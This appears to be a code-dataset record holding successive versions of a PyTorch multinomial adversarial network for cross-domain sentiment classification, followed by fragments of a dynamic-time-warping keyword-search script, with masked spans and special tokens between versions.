MlpFeatureExtractor(d['train'].X.shape[1],\n opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +\n opt.domain_hidden_size, opt.shared_hidden_size + opt.\n domain_hidden_size, 2, opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt\n .shared_hidden_size, len(opt.all_domains), opt.loss, opt.\n dropout, opt.D_bn)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.\n device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.\n parameters() if self.F_s else [], self.C.parameters()] + [f.\n parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n correct, total = defaultdict(int), defaultdict(int)\n d_correct, d_total = 0, 0\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n n_critic = opt.n_critic\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred == tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred == d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, train_iters, domain)\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss,\n len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n optimizer.step()\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs['display_step'] == 0:\n print('Epoch:', '%04d, done' % (epoch + 1))\n return loss_d_res, l_d_res, l_c_res\n <mask token>\n\n def get_name(self):\n if self._name is None:\n self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)\n return self._name\n",
"step-3": "<mask token>\n\n\nclass MultinomialAdversarialNetwork(TopicModel):\n\n def __init__(self, k, m, model_params=None, log_params=None):\n super().__init__(k, m, model_params, log_params)\n\n def prepare_data(self, d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n train = data_utils.TensorDataset(features, target)\n train_loaders[domain] = DataLoader(train, opt.batch_size,\n shuffle=True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n uset = data_utils.TensorDataset(features, target)\n unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,\n shuffle=True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n\n def fit(self, d, *args, **kwargs):\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self\n .prepare_data(d))\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.\n F_hidden_sizes, opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],\n opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +\n opt.domain_hidden_size, opt.shared_hidden_size + opt.\n domain_hidden_size, 2, opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt\n .shared_hidden_size, len(opt.all_domains), opt.loss, opt.\n dropout, opt.D_bn)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.\n device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.\n parameters() if self.F_s else [], self.C.parameters()] + [f.\n parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n correct, total = defaultdict(int), defaultdict(int)\n d_correct, d_total = 0, 0\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n n_critic = opt.n_critic\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred == tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred == d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, train_iters, domain)\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss,\n len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n optimizer.step()\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs['display_step'] == 0:\n print('Epoch:', '%04d, done' % (epoch + 1))\n return loss_d_res, l_d_res, l_c_res\n\n def transform(self, d, *args, **kwargs):\n F_d = self.F_d[opt.domains[0]]\n self.F_s.eval()\n F_d.eval()\n self.C.eval()\n _, _, _, it = self.prepare_data(d)\n it = it[opt.unlabeled_domains[0]]\n correct = 0\n total = 0\n confusion = ConfusionMeter(opt.num_labels)\n preds = []\n for inputs, targets in it:\n inputs = inputs.to(opt.device)\n targets = targets.to(opt.device)\n d_features = F_d(inputs)\n features = torch.cat((self.F_s(inputs), d_features), dim=1)\n outputs = self.C(features)\n _, pred = torch.max(outputs, 1)\n confusion.add(pred.data, targets.data)\n total += targets.size(0)\n correct += (pred == targets).sum().item()\n acc = correct / total\n return acc, correct\n\n def get_name(self):\n if self._name is None:\n self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)\n return self._name\n",
"step-4": "import numpy as np\nfrom ..utils import Dataset\nimport math\nimport random\nfrom .interface import TopicModel\nfrom .man_model.models import *\nfrom .man_model import utils\nfrom .man_model.options import opt\nimport torch.utils.data as data_utils\nfrom tqdm import tqdm\nfrom collections import defaultdict\nimport itertools\nfrom torchnet.meter import ConfusionMeter\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nimport torch.optim as optim\nfrom torch.utils.data import ConcatDataset, DataLoader\n<mask token>\n\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x, axis=1).reshape(-1, 1))\n return e_x / np.sum(e_x, axis=1).reshape(-1, 1)\n\n\nclass MultinomialAdversarialNetwork(TopicModel):\n\n def __init__(self, k, m, model_params=None, log_params=None):\n super().__init__(k, m, model_params, log_params)\n\n def prepare_data(self, d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n train = data_utils.TensorDataset(features, target)\n train_loaders[domain] = DataLoader(train, opt.batch_size,\n shuffle=True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n uset = data_utils.TensorDataset(features, target)\n unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,\n shuffle=True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n\n def fit(self, d, *args, **kwargs):\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self\n .prepare_data(d))\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.\n F_hidden_sizes, opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],\n opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +\n opt.domain_hidden_size, opt.shared_hidden_size + opt.\n domain_hidden_size, 2, opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt\n .shared_hidden_size, len(opt.all_domains), opt.loss, opt.\n dropout, opt.D_bn)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.\n device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.\n parameters() if self.F_s else [], self.C.parameters()] + [f.\n parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n correct, total = defaultdict(int), defaultdict(int)\n d_correct, d_total = 0, 0\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n n_critic = opt.n_critic\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred == tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred == d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, train_iters, domain)\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss,\n len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n optimizer.step()\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs['display_step'] == 0:\n print('Epoch:', '%04d, done' % (epoch + 1))\n return loss_d_res, l_d_res, l_c_res\n\n def transform(self, d, *args, **kwargs):\n F_d = self.F_d[opt.domains[0]]\n self.F_s.eval()\n F_d.eval()\n self.C.eval()\n _, _, _, it = self.prepare_data(d)\n it = it[opt.unlabeled_domains[0]]\n correct = 0\n total = 0\n confusion = ConfusionMeter(opt.num_labels)\n preds = []\n for inputs, targets in it:\n inputs = inputs.to(opt.device)\n targets = targets.to(opt.device)\n d_features = F_d(inputs)\n features = torch.cat((self.F_s(inputs), d_features), dim=1)\n outputs = self.C(features)\n _, pred = torch.max(outputs, 1)\n confusion.add(pred.data, targets.data)\n total += targets.size(0)\n correct += (pred == targets).sum().item()\n acc = correct / total\n return acc, correct\n\n def get_name(self):\n if self._name is None:\n self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)\n return self._name\n",
"step-5": "#This version assumes domains = train/test set\nimport numpy as np\nfrom ..utils import Dataset\nimport math\nimport random\nfrom .interface import TopicModel\nfrom .man_model.models import *\nfrom .man_model import utils\nfrom .man_model.options import opt\nimport torch.utils.data as data_utils\nfrom tqdm import tqdm\nfrom collections import defaultdict\nimport itertools\nfrom torchnet.meter import ConfusionMeter\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nimport torch.optim as optim\nfrom torch.utils.data import ConcatDataset, DataLoader\n\n\"\"\"\nIMPORTANT: for some reason, Model (self.F_s,etc) will not work if inputs are not float32\n=> need to convert. Dont know if same thing for target tho?\nAlso apparently, domain labels retrieved from get_domain_labels cannot be -1?\nOutput size for C HAS TO BE 2 even if it's a binary classification\n\"\"\"\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x, axis=1).reshape(-1, 1))\n return e_x / np.sum(e_x, axis=1).reshape(-1, 1)\n\nclass MultinomialAdversarialNetwork(TopicModel):\n def __init__(self, k, m, model_params=None, log_params=None):\n super().__init__(k,m,model_params,log_params)\n \n def prepare_data(self,d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n #CONVERT TO FLOAT32\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape((-1,1))\n train = data_utils.TensorDataset(features,target)\n train_loaders[domain] = DataLoader(train, opt.batch_size, shuffle = True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape(-1,1))\n uset = data_utils.TensorDataset(features,target)\n unlabeled_loaders[domain] = DataLoader(uset,opt.batch_size, shuffle = True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n \n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n \n \n def fit(self, d, *args, **kwargs):\n #minibatches = create_minibatch(X, y, z, batch_size)\n #TODO: make this able to fit consecutively\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = self.prepare_data(d)\n #Training\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.F_hidden_sizes,opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1], opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size + opt.domain_hidden_size, opt.shared_hidden_size + opt.domain_hidden_size, 2,opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt.shared_hidden_size,len(opt.all_domains), opt.loss, opt.dropout, opt.D_bn)\n# print(\"try\")\n# print(opt.device)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n# print(\"endtry\")\n# # optimizers\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.parameters() if self.F_s else [], self.C.parameters()] + [f.parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n\n # training accuracy\n correct, total = defaultdict(int), defaultdict(int)\n # D accuracy\n d_correct, d_total = 0, 0\n # conceptually view 1 epoch as 1 epoch of the first domain\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n # D iterations\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n # optional WGAN n_critic trick\n n_critic = opt.n_critic\n\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n # train on both labeled and unlabeled domains\n for domain in opt.unlabeled_domains:\n # targets not used\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain, len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n # D accuracy\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred==tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred==d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n # F&C iteration\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n #if opt.fix_emb:\n # utils.freeze_net(self.F_s.word_emb)\n # map(utils.freeze_net, self.F_d.values())\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, train_iters, domain)\n #target = torch.int64 rn\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n #return c_outputs, targets\n #DEVICE SIDE TRIGGERED ERROR OCCUR HERE (l_c=...)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n # training accuracy\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n # update F with D gradients on all domains\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain, len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss, len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n \n\n optimizer.step()\n \n\n# print(loss_d)\n# print('l_d loss: {}'.format(l_d.item()))\n# print('l_c loss: {}'.format(l_c.item()))\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs[\"display_step\"] == 0:\n print(\n \"Epoch:\", \"%04d, done\" % (epoch + 1) #\"cost=\", \"{:.9f}\"#.format(l_d.data[0])\n )\n return loss_d_res, l_d_res, l_c_res\n \n def transform(self, d, *args, **kwargs):\n F_d = self.F_d[opt.domains[0]]\n self.F_s.eval()\n F_d.eval()\n self.C.eval()\n _,_,_,it = self.prepare_data(d)\n it = it[opt.unlabeled_domains[0]]\n correct = 0\n total = 0\n confusion = ConfusionMeter(opt.num_labels)\n preds = []\n for inputs,targets in it:\n inputs = inputs.to(opt.device)\n targets = targets.to(opt.device)\n d_features = F_d(inputs)\n features = torch.cat((self.F_s(inputs), d_features), dim=1)\n outputs = self.C(features)\n _, pred = torch.max(outputs, 1)\n #preds.extend(pred.data)\n confusion.add(pred.data, targets.data)\n total += targets.size(0)\n correct += (pred == targets).sum().item()\n acc = correct / total\n #('{}: Accuracy on {} samples: {}%'.format(name, total, 100.0*acc))\n return acc, correct\n #return preds\n \n def get_name(self):\n if self._name is None:\n self._name = \"MAN({},{},{})\".format(self.k,self.m,1)\n return self._name",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def buildExpectations(queryPath, searchPatternPath):
"""
Based on SpeechCommand_v0.02 directory structure.
"""
expectations = []
currentDirectory = ''
queryFilename = queryPath.split('/')[-1]
queryDirectory = queryPath.split('/')[-2]
queryCode = queryFilename.split('_')[0]
searchFileList = sorted(glob.glob(searchPatternPath))
for searchFile in searchFileList:
searchFilename = searchFile.split('/')[-1]
searchDirectory = searchFile.split('/')[-2]
searchCode = searchFilename.split('_')[0]
if searchDirectory != currentDirectory:
currentDirectory = searchDirectory
if searchCode == queryCode:
if currentDirectory == queryDirectory:
expectations.append([[0, 1]])
else:
expectations.append([[0, 0]])
return expectations
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Dynamic Time Warping')
parser.add_argument('-g', '--graph', action='store_true', help=
'Enable graph display')
parser.add_argument('-t', '--threshold', type=float, default=0.4, help=
'Set score threshold')
parser.add_argument('query_path')
parser.add_argument('search_pattern_path')
printGroup = parser.add_mutually_exclusive_group()
printGroup.add_argument('-p', '--percentage', action='store_true', help
='Enable percentage display')
printGroup.add_argument('-v', '--verbose', action='store_true', help=
'Enable verbose display')
args = parser.parse_args()
GRAPH = args.graph
PERCENTAGE = args.percentage
threshold = args.threshold
VERBOSE = args.verbose
queryPath = args.query_path
searchPatternPath = args.search_pattern_path
dtw.VERBOSE = VERBOSE
stats.VERBOSE = VERBOSE
labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)
results = dtw.computeResultsPrecisely(sweepList, threshold,
positiveOnly=True)
for i, result in enumerate(results):
print(labels[i] + ': ', end='')
for j, (hitIndex, _) in enumerate(result):
print(hitIndex * 3, end='')
if j < len(result) - 1:
print(' | ', end='')
print()
if GRAPH:
dtw.showSweeps(labels, sweepList, bestList)
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
GRAPH = False
PERCENTAGE = False
VERBOSE = False
def buildExpectations(queryPath, searchPatternPath):
"""
Based on SpeechCommand_v0.02 directory structure.
"""
expectations = []
currentDirectory = ''
queryFilename = queryPath.split('/')[-1]
queryDirectory = queryPath.split('/')[-2]
queryCode = queryFilename.split('_')[0]
searchFileList = sorted(glob.glob(searchPatternPath))
for searchFile in searchFileList:
searchFilename = searchFile.split('/')[-1]
searchDirectory = searchFile.split('/')[-2]
searchCode = searchFilename.split('_')[0]
if searchDirectory != currentDirectory:
currentDirectory = searchDirectory
if searchCode == queryCode:
if currentDirectory == queryDirectory:
expectations.append([[0, 1]])
else:
expectations.append([[0, 0]])
return expectations
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Dynamic Time Warping')
parser.add_argument('-g', '--graph', action='store_true', help=
'Enable graph display')
parser.add_argument('-t', '--threshold', type=float, default=0.4, help=
'Set score threshold')
parser.add_argument('query_path')
parser.add_argument('search_pattern_path')
printGroup = parser.add_mutually_exclusive_group()
printGroup.add_argument('-p', '--percentage', action='store_true', help
='Enable percentage display')
printGroup.add_argument('-v', '--verbose', action='store_true', help=
'Enable verbose display')
args = parser.parse_args()
GRAPH = args.graph
PERCENTAGE = args.percentage
threshold = args.threshold
VERBOSE = args.verbose
queryPath = args.query_path
searchPatternPath = args.search_pattern_path
dtw.VERBOSE = VERBOSE
stats.VERBOSE = VERBOSE
labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)
results = dtw.computeResultsPrecisely(sweepList, threshold,
positiveOnly=True)
for i, result in enumerate(results):
print(labels[i] + ': ', end='')
for j, (hitIndex, _) in enumerate(result):
print(hitIndex * 3, end='')
if j < len(result) - 1:
print(' | ', end='')
print()
if GRAPH:
dtw.showSweeps(labels, sweepList, bestList)
plt.show()
<|reserved_special_token_1|>
import dtw
import stats
import glob
import argparse
import matplotlib.pyplot as plt
GRAPH = False
PERCENTAGE = False
VERBOSE = False
def buildExpectations(queryPath, searchPatternPath):
"""
Based on SpeechCommand_v0.02 directory structure.
"""
expectations = []
currentDirectory = ''
queryFilename = queryPath.split('/')[-1]
queryDirectory = queryPath.split('/')[-2]
queryCode = queryFilename.split('_')[0]
searchFileList = sorted(glob.glob(searchPatternPath))
for searchFile in searchFileList:
searchFilename = searchFile.split('/')[-1]
searchDirectory = searchFile.split('/')[-2]
